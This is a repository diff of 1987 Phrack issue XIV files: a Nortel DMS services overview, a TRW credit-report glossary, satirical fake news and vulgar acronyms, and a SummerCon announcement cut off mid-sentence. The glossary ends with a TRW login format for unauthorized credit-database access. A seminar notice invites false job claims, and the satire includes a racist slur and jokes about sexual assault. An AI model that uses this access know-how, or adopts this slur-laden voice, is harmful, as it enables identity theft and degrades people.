|
||||
|
||||
Auxiliary Operator Services System
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The DMS-200 Auxiliary Operator Services System (AOSS) is used primarily for
|
||||
Directory Assistance and the intercept needs that are not included in the TOPS
|
||||
package. The AOSS is similar to TOPS and co-exists with TOPS on the DMS-200
|
||||
Toll system.
|
||||
|
||||
Major benefits of the AOSS include: Directory Assistance is provided with a
|
||||
modern environment, AOSS position administrative activities are performed by
|
||||
the DMS-200 toll maintenance system, trunking savings are achieved by
|
||||
combining trunking for 1+, 0+, and Directory Assistance traffic, DA services
|
||||
are managed by using TOPS methods, creation of a built-in training system
|
||||
which does not require additional training equipment and reduces training
|
||||
costs.
|
||||
|
||||
|
||||
Integrated Business Network
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The Integrated Business Network (IBN) is a revenue-producing concept designed
|
||||
for small and big businesses to offer modernized PBX and Centrex features.
|
||||
The Operating Company can use the IBN to maintain and enhance its competitive
|
||||
position on a operational DMS-100 and DMS 100/200 switches. While using the
|
||||
DMS-100 switch, the Operating Company can support varying business features
|
||||
along with existing local/toll traffic.
|
||||
|
||||
IBN services can be introduced to a Centrex-Central Office (CO) or a
|
||||
Centrex-Customer Unit (CU) by additional software modules and minor hardware
|
||||
enhancements.
|
||||
|
||||
Current IBN features include: A growing system that can handle 30,000 lines,
|
||||
networking capabilities, city wide service for DMS-100 switch and remotes for
|
||||
any one customer Station Message Detail Recording (SMDR), which gives IBN
|
||||
customers call records. The records can be used for system analysis and
|
||||
control and station charge-back. SMDR can use LAMA records (if the IBN host
|
||||
has LAMA equipment), centralized attendant maintenance, and administration
|
||||
functions and Direct Inward Dialing (DID).
|
||||
|
||||
|
||||
Electronic Switched Network (ESN)
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The Electronic Switched Network is designed to meet the telecommunication
|
||||
needs of large multi-location corporations. The ESN is made up of a SL-1 or
|
||||
SL-100 Digital Business Communications System with networking features or a
|
||||
DMS-100 IBN host. The SL-1 can handle from 30-5000 lines. The SL-100 and the
|
||||
DMS-100 IBN hosts can hold from a few thousands to 30,000 lines.
|
||||
|
||||
A DMS-100 IBN or SL-100 can remotely serve many locations from the host site.
|
||||
This is done by a connection through digital transmission facilities which are
|
||||
set up at remote modules at the subscriber's premises.
|
||||
|
||||
Here are some diagrams showing the differences between normal private
|
||||
telecommunications networks and ESN networks.
|
||||
|
||||
Normal telecommunications network
|
||||
=================================
|
||||
|
||||
----- ------
|
||||
[Phone]--| SnS | | SL-1 |-[Phone]
|
||||
| PBX | | PBX |
|
||||
----- ------
|
||||
| |DOD/DID DOD/DID| |
|
||||
| ------- ------- |
|
||||
|Tie | | Tie|
|
||||
|Trunk --------- Trunk|
|
||||
------| Class-5 |------
|
||||
----| Centrex |----
|
||||
| --------- |
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
----- Tie Trunk ---------
|
||||
| SnS | ----------| Class-5 |
|
||||
| PBX | | Centrex |
|
||||
----- ---------
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
------- ------
|
||||
[Phone]-| Small | | SL-1 |-[Phone]
|
||||
| PBX | | |
|
||||
------- ------
|
||||
|
||||
|
||||
ESN Network
|
||||
===========
|
||||
-------- ----------
|
||||
[phone]--| Remote | | SL-1 PBX |--[phone]
|
||||
| Module | | ESN Main |
|
||||
-------- ----------
|
||||
| |
|
||||
| DS-1 Facility | DS-1 Facility
|
||||
| -------------- |
|
||||
--------> | Local Class 5| <---------
|
||||
[phone]---------| DMS-100 |
|
||||
----| IBN/ESN |-------------
|
||||
2W Loop MFIDP | -------------- | ESN Trunk Group
|
||||
or DS-1 | | | or DS-1
|
||||
| ----- ---------------
|
||||
| | CSC | | Local Class 5 |
|
||||
-------- ----- | DMS-100 |
|
||||
| SL-100 | <--- DS-1 ----> | IBN/ESN |
|
||||
-------- Facility ---------------
|
||||
| |
|
||||
| |
|
||||
| DS-1 Facility | DS-1 Facility
|
||||
| |
|
||||
-------- ----------
|
||||
[phone]--| Remote | | SL-1 PBX |--[phone]
|
||||
| Module | | ESN Main |
|
||||
-------- ----------
|
||||
|
||||
|
||||
|
||||
|
||||
Specialized Common Carrier Service (SCCS)
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The DMS-250 Specialized Common Carrier Service (SCCS) provides the capability
|
||||
of Analog to Digital (A/D) and Digital to Analog (D/A) conversions which are
|
||||
necessary with analog circuits. The DMS-250 can also switch voice and data
|
||||
circuits.
|
||||
|
||||
The DMS-250 takes either analog or digitally encoded info and by using time
|
||||
slot interchange, switches it from any input port to a temporary addressed and
|
||||
connected exit port. The info may or may not be converted back to analog.
|
||||
|
||||
Cellular Mobile Radio Service
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
A cellular system consists of two main parts: a cellular switch and cell site
|
||||
equipment.
|
||||
|
||||
|
||||
Cellular Switching Systems
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
A cellular switch performs three main functions: audio switching, cell site
|
||||
control, and system administration.
|
||||
|
||||
The DMS switches provide three basic implementations for cellular switching:
|
||||
Stand-alone, Combined, and Remote.
|
||||
|
||||
Stand-alone switching is done by a Mobile Telephone Exchange (MTX) which is
|
||||
interfaced with one or more class 5 end offices. The connection is made by
|
||||
DID/DOD trunks. Depending on the needs of the area, the MTX can be divided as
|
||||
follows: MTX which serves urban areas, MTXC which handles suburban areas, and
|
||||
MTXM which is used for rural areas.
|
||||
|
||||
Combined switching is incorporated into a DMS-100 by some hardware additions
|
||||
and cellular software. Combined switching is designed to give an easy,
|
||||
cost-effective way to install cellular services to an existing host.
|
||||
|
||||
Remote Switching is done by combining Remote Switching Center (RSC) with a
|
||||
Cell Site Controller (CSC). This combination is hosted by either a
|
||||
stand-alone or a combined switch. Remote Switching is designed for serving
|
||||
suburban centers, remote areas, or a small community and it gives extra
|
||||
flexibility for a growing system.
|
||||
|
||||
All of these cellular switches have the ability to balance the workload among
|
||||
various cell sites. For example, if one site's workload reaches the
|
||||
programmable level of congestion, calls would be routed to nearby sites that
|
||||
can handle the extra calls.
|
||||
|
||||
|
||||
Cell Site Equipment
|
||||
~~~~~~~~~~~~~~~~~~~
|
||||
Cell site equipment consists of a CSC and radio equipment. The CSC is
|
||||
controlled by the cellular switch and it controls radio equipment and
|
||||
maintenance tasks. The CSC will work on any MTX cellular switch because of
|
||||
the Remote Cluster Controller (RCC).
|
||||
|
||||
The radio equipment consists of self-contained Radio Channel Units (RCU),
|
||||
antennas, transmitter multi-couplers, and receiver combiners.
|
||||
|
||||
By different program software, an RCU can perform voice, control locating, and
|
||||
test functions. The self contained nature allows the RCU be remotely located
|
||||
to the CSC. A RCU has built-in circuitry for extended testing of the radio
|
||||
part of the system.
|
||||
|
||||
|
||||
Control C
|
||||
|
||||
<End of File>
|
||||
<May 1987>
|
||||
______________________________________________________________________________
|
129
phrack14/6.txt
Normal file
129
phrack14/6.txt
Normal file
|
@ -0,0 +1,129 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Issue XIV, File 6 of 9
|
||||
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
|
||||
TRW Business Terminology
|
||||
~~~ ~~~~~~~~ ~~~~~~~~~~~
|
||||
by Control C
|
||||
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
|
||||
Term Explanation
|
||||
---- -----------
|
||||
Legal Legal Involvement
|
||||
Collect Collection Account
|
||||
Writ-Off Account Written Off
|
||||
NSF Not Sufficient Funds
|
||||
Lease Default Lease Default
|
||||
Liens Liens
|
||||
Repo Repossessed
|
||||
RFC Refused Further Credit
|
||||
Pays-Sol Pays Slow
|
||||
Not Pay AA Not Paying as Agreed
|
||||
Cia-Our-Req Cash in Advance-Our Request
|
||||
Was Pastdue Account was Past Due
|
||||
Was Problem Problems In the Past
|
||||
CIA Cash in Advance
|
||||
Adj.Bureau Adjustment Bureau
|
||||
COD Cash on Delivery
|
||||
COD Cusreq COD Customer Request
|
||||
Adv-Trend Advertise Trend
|
||||
New Owner Recent Ownership Change
|
||||
Hldg-Ord Holding Orders
|
||||
Secured Secured Account
|
||||
Discount Discount
|
||||
Improving Improving
|
||||
Unr-Disc Unearned Discount Taken
|
||||
X-Deduct Unauthorized Deductions
|
||||
Ref Fin Chg Refused Finance Charge
|
||||
Satsftry Satisfactory Account
|
||||
Bond Satis Bonding Satisfactory
|
||||
Prompt Pays Promptly
|
||||
Exlent Acct Excellent Account
|
||||
1st Sale First Sale
|
||||
21 Dys Late 21 Days Late
|
||||
14 Dys Late 14 Days Late
|
||||
7 Dys Late 7 Days Late
|
||||
Exc Disc Excessive Discount Taken
|
||||
Dispute Dispute Invoice
|
||||
Prod Complt Product Complaint
|
||||
Consol Note Consolidation Note
|
||||
Ltd.Exp Limited Experience
|
||||
Note Pays By Note
|
||||
Floor Plan Floor Plan Account
|
||||
Trd-Acpt Pays by Trade Acceptance
|
||||
Ern Disc Earned Discount Taken
|
||||
Job Complet Job Completed
|
||||
Unfl-Ord Unfilled Orders
|
||||
Installment Installment Account
|
||||
New Account New Account
|
||||
Consignment Sell on Consignment
|
||||
Retention Retention
|
||||
Multi Locate Multiple Locations Comments not Available
|
||||
ADS XXX Average Days Slow
|
||||
Sold XXX Yrs Number of Years Sold
|
||||
DDWA XXX Dollar-Days Weighted Average
|
||||
|
||||
|
||||
Payment Terms
|
||||
------- -----
|
||||
|
||||
Term Explanation
|
||||
---- -----------
|
||||
Net X Net Due in X Days
|
||||
Net Eom Net amount due by the end of the month
|
||||
Net Prx Net amount due on the 1st of the following month
|
||||
N10 Prxo Net due within 10 days of the first of the following month
|
||||
N10 Eom Net due within 10 days of the end of the month
|
||||
X/10 N15 X Percentage discount if paid in 10 days or total amount
|
||||
due in 15 days
|
||||
X/15 N30 X percentage discount if paid in 15 days or total amount
|
||||
due in 30 days
|
||||
X/30 N45 X percentage discount if paid in 30 days or total amount
|
||||
due in 45 days
|
||||
X/10 Eom X percentage discount if paid in 10 days or total amount
|
||||
due at the end of the month
|
||||
X/15 Eom X percentage discount if paid in 15 days or total amount
|
||||
due at the end of the month
|
||||
X/10 Prx X percentage discount if paid in 10 days, otherwise due on
|
||||
the first of the following month
|
||||
X/15 Prx X percentage discount if paid in 15 days, otherwise due on
|
||||
the first of the following month
|
||||
X/Eom X percentage discount if paid by end of month
|
||||
X/Prox X percentage discount if paid by the first of the following
|
||||
month
|
||||
Cs Dis Discount in return for payment before final due date.
|
||||
Tr Dis Reduction of the selling price and is always available to the
|
||||
customer regardless of the lateness of the payment
|
||||
Special Special terms offered by seller
|
||||
Contrct As stated in contract
|
||||
Varied Offers several different terms
|
||||
Roi Remit on receipt of invoice
|
||||
D/S Draft Payable at sight
|
||||
D/O Draft with order
|
||||
COD Cash on Delivery
|
||||
COD-Req COD at seller's request
|
||||
CIA Cash in advance
|
||||
CIA-Req CIA at seller's request
|
||||
CWO Cash with order
|
||||
NET Balance Due
|
||||
Multi Customer has more than one way of paying
|
||||
Note Written promise to pay at a specific time
|
||||
Cash Cash only
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Login
|
||||
-----
|
||||
The proper format for TRW is as follows:
|
||||
|
||||
TCA1 RTS subcode+pw lastname firstname middleinitial...,street# streetinit
|
||||
zipcode
|
||||
|
||||
Example: (Subscriber code is 1234567 and PW is OS5)
|
||||
|
||||
TCA1 RTS 1234567OS5 SMITH JOHN S...,3123 H 37923[Ctrl S][Ctrl M]
|
||||
|
||||
^C
|
||||
______________________________________________________________________________
|
289
phrack14/7.txt
Normal file
289
phrack14/7.txt
Normal file
|
@ -0,0 +1,289 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Issue XIV, File 7 of 9
|
||||
|
||||
^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^
|
||||
PWN PWN
|
||||
^*^ ^*^ Phrack World News ^*^ ^*^
|
||||
PWN Special Edition I PWN
|
||||
^*^ ^*^
|
||||
PWN Edited, Compiled, and Written PWN
|
||||
^*^ by Knight Lightning ^*^
|
||||
PWN PWN
|
||||
^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^
|
||||
|
||||
Welcome to the first Phrack World News "Special Edition." In this issue we
|
||||
have two parts. The first section deals with possible news stories of the
|
||||
future after the weekend of June 19-21... SummerCon '87! The second section
|
||||
is a presentation of acronyms that never were, but should be. All posts have
|
||||
been taken from Metal Shop Private prior to its takedown in June. Posts have
|
||||
been edited for this presentation.
|
||||
|
||||
PWN Special Edition is not a regular series and will only appear when the
|
||||
author deems it necessary to release one. Please keep in mind that all
|
||||
material in this file was written several weeks prior to SummerCon '87 and
|
||||
therefore the events chronicled here are supposed fiction and comedy.
|
||||
|
||||
Thank you -KL.
|
||||
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
|
||||
Name: Phantom Phreaker
|
||||
|
||||
SummerCon Prank Backfires June 31, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Well, the SummerCon went over well, except when the convention attendees stole
|
||||
every payphone in the building and placed them in front of Taran King's hotel
|
||||
room, rang the door, and shouted "Room Service." Needless to say, Taran King
|
||||
is now in jail until he can pay for all the stolen payphones.
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Knight Lightning
|
||||
|
||||
Phreak/Hack World Shut Down! June 21, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
It happened yesterday when John Maxfield accompanied by Ralph Meola, Richard
|
||||
Proctor, Dan Pasquale, Edward P. Nowicki, and several members of the FBI,
|
||||
Secret Service, National Security Agency, and local baggers 402 literally
|
||||
invaded SummerCon '87, the annual phreak/hack reunion. It has been reported
|
||||
that a total of 97 suspects have been placed in custody with crimes linking
|
||||
them to jay walking, loitering, curfew violation, disturbing the peace, and
|
||||
belching in excessive amounts.
|
||||
|
||||
Details are sketchy but it appears that it all started when a very drunk pair
|
||||
of twins decided to visit the local McDonald's and demanded a COSMOS Sundae
|
||||
with passwords on the side. When a very confused McDonald's employee refused,
|
||||
they became agitated and whipped out a blue box, using it to open the "trunks"
|
||||
of all the cars in the parking lot and then finally throwing it at an
|
||||
employee. A mad crowd of people rushed to the Best Western Executive
|
||||
International Inn and tried to storm the building when the other previously
|
||||
mentioned uninvited guests arrived.
|
||||
|
||||
Final remarks from the twins... "So who wants to discuss CAMA?"
|
||||
|
||||
Information provided by F. R. Newsline Services and on the scene reporting by
|
||||
Broadway Hacker (arrested for attempted prostitution).
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Thomas Covenant
|
||||
|
||||
SummerCon '87 "Laugh Riot"; Numerous Phreaks Still Missing June 25, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
(St Louis, PP) Authorities are still searching for the nearly 100 missing
|
||||
telecom enthusiasts who gathered in town over the weekend for a convention.
|
||||
Apparently the missing parties were sitting around, undergoing the intake of
|
||||
many assorted consciousness altering chemicals, when a strange young man with
|
||||
shoulder length hair and wearing a Judas Priest jacket appeared. He forced
|
||||
them all into a white 1957 Chevy pickup and took off, leaving only Evil Jay
|
||||
and Thomas Covenant behind. Evil Jay was quoted as saying it was a "laugh
|
||||
riot." Thomas Covenant had nothing to say as he is in shock from the incident
|
||||
and currently undergoing treatment at the St. Louis Home for the Terminally
|
||||
Bewildered.
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Phantom Phreaker
|
||||
|
||||
Computer Enthusiasts Infected With The AIDS Virus June 22, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
>From St. Louis Post Dispatch
|
||||
|
||||
They called it "SummerCon," a gathering of "phone phreaks" and computer
|
||||
hackers who are loosely organized around a network of computer bulletin
|
||||
boards. However, tragedy struck the meeting when the hacker named Evil Jay
|
||||
tricked another hacker, Suicidal Nightmare, into entering the room belonging
|
||||
to Broadway Hacker. Suicidal Nightmare was found in the parking lot with a
|
||||
torn anus.
|
||||
|
||||
As if this wasn't bad enough, Broadway Hacker then went wild and began trying
|
||||
to molest the smallest hackers there. He could be seen chasing Kango Kid
|
||||
while screaming about a flaming mailbox and rubbing his genital area.
|
||||
|
||||
Other problems arose from the hackers meeting. Several people were arrested
|
||||
for possession of cannibus and illegal possession of alcohol. The other
|
||||
charges included:
|
||||
|
||||
o Intoxicated Pedestrian
|
||||
o Disturbing the Peace
|
||||
o Contributing to the delinquency of a minor
|
||||
o Failure to yield at stop sign
|
||||
o No turn signal
|
||||
o Theft of telephones
|
||||
o Verbally harassing telephone operators
|
||||
|
||||
As you can see, these computer 'hackers' have no morals and decency and should
|
||||
not be allowed to meet.
|
||||
|
||||
(C) Post Dispatch 2050
|
||||
Written by Jack Meoff
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Knight Lightning
|
||||
|
||||
Phreak World Crippled; SummerCon Causes Despair June 22, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Today, the phreak world was astounded and dealt a horrifying blow as all the
|
||||
phreaks who attended SummerCon left with their entire phreak knowledge
|
||||
literally erased from their minds due to an excess of drinking and other
|
||||
unknown mind altering substances. It is unknown as to if these effects are
|
||||
temporary or a life-long destruction.
|
||||
|
||||
|
||||
Anarchy World Takes Charge June 23, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
MetalliBashers Inc. have become the new "LOD" of the modem world since all of
|
||||
the LOD members no longer can even remember what LOD stands for (in fact, no
|
||||
one can, and forget I mentioned it!). With MBI taking charge, the new wave of
|
||||
the modem world has turned strictly anarchy, although there are rumors of
|
||||
various pirating organizations beginning to unload new wares soon.
|
||||
|
||||
|
||||
Investigators Lose Jobs! June 24, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
John Maxfield reportedly lost ALL contracts today when it was discovered that
|
||||
the phreak/hack community was completely destroyed, thus no one needed
|
||||
protection from them. He has now taken a job with the local sanitation
|
||||
management firm to help figure out what to do with all the garbage now that
|
||||
the phreak community wasn't stealing 1/3 of it anymore.
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Evil Jay
|
||||
|
||||
Suicidal Nightmare - History June 23, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Suicidal Nightmare met death head on when Evil Jay knocked on his door
|
||||
pretending to be a lineman checking on his line. Once inside, Jay proceeded
|
||||
to swing a hand set at him with amazing accuracy. Once dragged outside, Jay
|
||||
then proceeded to tie Suicidal naked to a tree and call the ever-lovin'
|
||||
Broadway Hacker over to do his stuff. Jay was last heard pleading insanity.
|
||||
Suicidal Nightmare remains in intensive care, and Broadway Hacker is happy.
|
||||
______________________________________________________________________________
|
||||
|
||||
That is the last of the news reports, now on with "Those Amazing Acronyms...!"
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Doom Prophet
|
||||
|
||||
FUCK-Facilities Utilization Control Kitchen. A really hot office. They keep
|
||||
backups of all systems per a LATA, or in special cases, the entire BOC
|
||||
area, along with user logs and passwords. They use the CUNTLICK system
|
||||
to interface with SHIT, explained momentarily. They are difficult to
|
||||
reach as no one knows their number, and anyone calling it has to enter a
|
||||
special queue dispenser where he enters routing information to reach the
|
||||
FUCK ACD. The FUCK technicians answer as normal subscribers and you have
|
||||
to tell them a codeword.
|
||||
|
||||
PENIS-Plant Engineering Network Information System. Used by the PMS to deal
|
||||
with outside plant details and layout maps.
|
||||
|
||||
CUNTLICK-Computer Utilities Network In the Control Kitchen. Used to sensor
|
||||
with SHIT.
|
||||
|
||||
SHIT-Supreme Hardware Inventory Totals. Self explanatory.
|
||||
|
||||
CRAP-Customer Repair Analysis Service. They use PENIS to supply PMS with
|
||||
info.
|
||||
|
||||
PISS-Primary Intertoll Switching Servicemen. Co-ordinate classes 1 through 4
|
||||
toll offices and monitor the STP's.
|
||||
|
||||
BITCH-Building Installation Table Channel. Used by SHIT technicians to obtain
|
||||
new switch and office status.
|
||||
|
||||
SCAB-Switching Cable Analysis Bureau. They work with PMS for trunk testing
|
||||
and maintenance. The systems they use are FART and DOPAMINE.
|
||||
|
||||
BASTARD-Box Accessible System To Aid Real D00ds. A special in band NPA with
|
||||
full OSC support for blue boxers to experiment within legally. Only
|
||||
operating in special areas.
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Phantom Phreaker
|
||||
|
||||
DOGSHIT-Division Operations Group SHIT (see above post). DOGSHIT is like
|
||||
SHIT, except that DOGSHIT is in a division.
|
||||
|
||||
CATPISS-Centralized Automatic Tandem Priorities Interexchange Support System.
|
||||
Self-explanatory.
|
||||
|
||||
BEER-Bell Electrical Engineering Research
|
||||
|
||||
COOL-Computerized Operations On Loops
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: Taran King
|
||||
|
||||
BOOGER-Bell Operational Office for Generation of ESS Reports. Self
|
||||
Explanatory.
|
||||
|
||||
STAN-Spanish Tacos And Nachos. This support group, Californian based,
|
||||
maintains food services for all superior employees (all employees).
|
||||
|
||||
NATE-Nacho And Taco Emissary. This department secretly interfaces STAN with
|
||||
the rest of the network due to the STAN group's inability to fit in with
|
||||
society. **Due to divestiture, NATE and STAN are no longer part of the
|
||||
network**
|
||||
|
||||
IL DUCE-Not an acronym, but the janitorial services department of the network.
|
||||
|
||||
PUMPKIN-Peripheral Unit Modulator Phor Kitchen Installations of NATE. This
|
||||
group is in charge of interfacing kitchen activities through Project
|
||||
Genesis. See RAPE.
|
||||
|
||||
BRRR-RING-The official word for the sound an AT&T phone makes receiving an
|
||||
incoming call.
|
||||
|
||||
BANANA-Basic Analog Network Analog Network Analog (No wonder they went
|
||||
digital)
|
||||
|
||||
RAPE-Red Afro-PUMPKIN Enthusiast. This group, led by Peter, cheers IL DUCE
|
||||
while he sweeps the floors.
|
||||
|
||||
SCOOP-Secondary Command Output Only Procedure. This converts all text to
|
||||
lower case. It is a function used in most Bell computers along with
|
||||
LEX.
|
||||
|
||||
LEX-Lengthy Explanatory Xlations. This program, found alongside SCOOP,
|
||||
converts all lowercase text, from SCOOP, into upper case and 40 columns
|
||||
surrounded by "$"s.
|
||||
|
||||
** Warning! Never leave SCOOP and LEX running simultaneously or you will
|
||||
surely cause L666 to occur. **
|
||||
|
||||
L666-The warning message generated by computers indicating endless loops of
|
||||
conflicting jobs. This also indicates that everything is fucked. See
|
||||
LOKI.
|
||||
|
||||
LOKI-Life Over-Kill Incentive. If you find this error message on your
|
||||
computer, do not reboot the computer, but be sure to reboot something.
|
||||
______________________________________________________________________________
|
||||
|
||||
Name: The Disk Jockey
|
||||
|
||||
SNATCH-Senses Nodes And Traps Code Hackers
|
||||
|
||||
TITS-Telephone Involved in Tandem Skipping
|
||||
|
||||
PUBIC-Plastered Uniforms Brought Inside CO (An employee infraction)
|
||||
|
||||
RAD-Receive Analog Department
|
||||
|
||||
DISC-Deadbeats Instinctively Scanning for Carriers
|
||||
|
||||
LAP-Local Area Payphone
|
||||
|
||||
Or use the codewords that Linemen and Telco employees use....
|
||||
|
||||
This Means This
|
||||
---- ----------
|
||||
"OHFUCKNIGS" "I'm trapped in a phone booth in a black neighborhood"
|
||||
"FIDOFUCK" "A customer's pet dog has me trapped up a pole"
|
||||
"HOMEBONE" "I got laid while doing a customer's installation"
|
||||
"SNOOZEBOX" "I'm sleeping, but saying I'm fixing little green boxes"
|
||||
______________________________________________________________________________
|
||||
|
||||
This concludes Phrack World News Special Edition. I hope you enjoyed it. If
|
||||
you have any comments or ideas be sure to get in touch with me or Taran King.
|
||||
|
||||
:Knight Lightning
|
||||
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
345
phrack14/8.txt
Normal file
345
phrack14/8.txt
Normal file
|
@ -0,0 +1,345 @@
|
|||
PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN
|
||||
^*^ ^*^
|
||||
PWN ^*^ Phrack World News ^*^ PWN
|
||||
^*^ Issue XIV ^*^
|
||||
PWN PWN
|
||||
^*^ ^*^ Compiled, Written, and Edited ^*^ ^*^
|
||||
PWN by Knight Lightning PWN
|
||||
^*^ ^*^
|
||||
PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN
|
||||
|
||||
|
||||
On the Home Front/SummerCon '87 April 22, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Well I'd like to start off this issue with an apology to my readers. Although
|
||||
I had suspected it for quite some time, I never had any real reason to doubt
|
||||
the validity of some of the past events detailed in PWN. Please disregard and
|
||||
ignore these previous stories relating to Oryan QUEST.
|
||||
|
||||
Oryan QUEST Busted/415 Gets Hit Again PWN Issue 4-2
|
||||
Dan Pasquale Seeks New Entertainment PWN Issue 4-3
|
||||
Oryan QUEST Vs. Dan Pasquale PWN Issue 6-1
|
||||
Dan Pasquale: Still Hostile Or Ancient History? PWN Issue 7-1
|
||||
|
||||
The events regarding Oryan QUEST getting busted or having anything to do with
|
||||
Dan Pasquale (of the Fremont Police Department) were fictional propaganda
|
||||
devised and given to me under false pretenses by Oryan QUEST in an attempt to
|
||||
make himself look like a more experienced phreak and to give him more
|
||||
publicity and fame in the phreak/hack world.
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Re-Announcing SummerCon! The biggest and best phreak/hack convention ever!
|
||||
Scheduled for June 19,20 1987 in St. Louis, Missouri and sponsored by
|
||||
TeleComputist Newsletter, Phrack Inc., and Metal Shop Private.
|
||||
|
||||
The festivities will take place at the Executive International Best Western.
|
||||
There will be two adjoining rooms for guests to sack out in, but you are
|
||||
welcome to grab your own for space and privacy reasons. The phone number at
|
||||
the hotel is (314) 731-3800. The name being used to rent the rooms and the
|
||||
room numbers will remain unannounced until June 19, 1987 where this
|
||||
information will be placed on the Phrack Inc./Metal Shop Private VMS and the
|
||||
TeleComputist Information Line. This is to prevent any individuals from
|
||||
spoiling our fun at the Conference.
|
||||
|
||||
We have received quite a few confirmations about people going and have heard
|
||||
from dozens more who plan to attend. Just based on who we know for sure, this
|
||||
will be an event to remember for the rest of your lives.
|
||||
|
||||
The schedule works sort of like this;
|
||||
|
||||
Friday Night - Party and introductions
|
||||
Saturday Afternoon - The conference will commence in the hotel's banquet hall.
|
||||
Saturday Night - More partying
|
||||
Sunday Morning - Everyone cruises home
|
||||
|
||||
Guests are asked to please bring some extra cash to help pay for the expense
|
||||
of this weekend. The front money will be supplied by the sponsors, but any
|
||||
help will be greatly appreciated. Thanks.
|
||||
|
||||
Remember, everyone is welcome to show up. We only ask that you inform us
|
||||
(myself, Taran King, and/or Forest Ranger) of your plans. This also applies
|
||||
for speaking at the conference. Please inform us of the topic and how long
|
||||
you plan to talk.
|
||||
|
||||
If you have any further questions please contact Knight Lightning, Taran King,
|
||||
or Forest Ranger on any bulletin board you can find us, the Phrack Inc./Metal
|
||||
Shop Private VMS, or call the TeleComputist Information Line at 314-921-7938.
|
||||
|
||||
Hope to see you there.
|
||||
|
||||
:Knight Lightning
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
|
||||
*** Special Newsflash ***
|
||||
|
||||
^*^ Free Seminar ^*^
|
||||
|
||||
When: June 19, 1987 (Morning and Evening)
|
||||
Where: Sheraton Plaza
|
||||
900 West Port Plaza
|
||||
St. Louis, Missouri [Good timing isn't it]
|
||||
|
||||
Topics: Advanced Tolls For Protocol Analysis
|
||||
Using the OSI 7-layer model
|
||||
|
||||
Special operator interfaces for: - entry level operators
|
||||
- protocol technicians
|
||||
- software engineers
|
||||
|
||||
Test T1, SNA, X.25, ISDN, SS#7 with the same tester
|
||||
|
||||
Presented by: Atlantic Resource Corporation
|
||||
Featuring: The INTERVIEW 7000 (R) Series Protocol Analyzers
|
||||
Discussion: T1 Testing
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Call to register:
|
||||
|
||||
Tell them you are (pick one):
|
||||
|
||||
- A manger responsible for protocol testing and certification
|
||||
- An engineer developing OSI 7-layer protocols
|
||||
- A network manager
|
||||
- Tech control supervisors
|
||||
|
||||
Seating is limited so act quickly.
|
||||
|
||||
RSVP Atlantic Research Corp. 800-368-3261
|
||||
______________________________________________________________________________
|
||||
|
||||
Voice Numbers; The Road To Retirement April 5, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
A rebuttal by Kerrang Khan (Edited for PWN)
|
||||
|
||||
Contrary to popular opinion, I actually have a reason for not giving out my
|
||||
phone number. There has been enough bullshit about this "incident," and I
|
||||
guess it's time I gave my side of the story.
|
||||
|
||||
I don't want anyone to have my phone number. Nobody in the phreak/hack world
|
||||
